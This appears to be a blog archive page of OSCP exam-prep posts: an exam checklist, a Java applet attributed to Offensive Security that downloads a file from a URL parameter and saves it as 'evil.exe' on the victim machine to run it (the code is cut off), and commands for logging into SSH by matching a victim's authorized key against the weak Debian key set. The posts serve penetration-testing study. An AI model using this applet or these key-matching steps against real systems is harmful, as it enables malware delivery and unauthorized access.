Posts

Showing posts from January, 2020

Things to Remember for OSCP

All links for OSCP: Windows Enum, Linux Enum, Windows Priv Esc Cheatsheet, Windows Priv Esc Guif.re, CVE-Exploits

1) Start screen recording using OBS Screen Recorder
2) Check the machine IPs - start a timer (don't stay on a single machine for too long) - cracked a machine - restart the timer
3) Start the buffer overflow on the test machine - start NmapAutomator on all 4 machines before starting the BOF on the test machine
4) Take screenshots of everything
5) Start with the 10-point box after the BOF (25 points); if this is taking too long, switch to a new box. Come back to this later. Document everything.
6) HTTP is vulnerable most of the time - start with HTTP - start nikto, dirb, dirsearch, dirbuster - extensions - robots.txt, config.php, license.txt - try default creds - if the creds don't work, try searching for creds for some time - try CeWL --> use it for brute forcing - Check

Download a file onto Victim Machine using Java Applet and Sign the Applet

This is the Java code to download:

import java.applet.*;
import java.awt.*;
import java.io.*;
import java.net.URL;
import java.util.*;

/**
 * Author: Offensive Security
 * This Java applet will download a file and execute it.
 **/
public class Java extends Applet {
    private Object initialized = null;

    public Object isInitialized() {
        return initialized;
    }

    public void init() {
        Process f;
        try {
            String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
            String expath = tmpdir + "evil.exe";
            String download = "";
            download = getParameter("1");
            if (download.length() > 0) {
                // URL parameter
                URL url = new URL(download);
                // Get an input stream for reading
                InputStream in = url.openStream();
                // Create a buffered inp

Using SSH-DSS authorized keys to login to SSH Server without password

For this method to work, you need to have the authorized key of the victim machine:

cat authorized_keys
ssh-dss AAAAB3NzaC1kc3MAAACBAOgzzMCD3Im5bRnAVdV3yLwTs................................

SSH-DSS is disabled on new versions of SSH, so you need to enable it:

nano /etc/ssh/ssh_config
PubkeyAcceptedKeyTypes +ssh-dss

git clone https://github.com/g0tmi1k/debian-ssh
tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2
cd /dss/1024

Copy the first few characters from the authorized key; we are going to search for that key in the list of keys we downloaded earlier:

grep -lr 'AAAAB3Ndskkdsjhfodsi4m5adsa6d5s8RadSsdsWassd3rhf6gySd2sdS34rW'

You can see a file with random characters and a .pub extension, e.g. e2eb2172a62d0d7e40f210g6167f65ca-12345.pub. But what we need is not the public key - we need the private key to log in :) So search for it again:

ls -la | grep e2eb2172a62d0

Now you can see two files, one private key and one public key; use e2eb2172a62d0d7e40f210g6167f6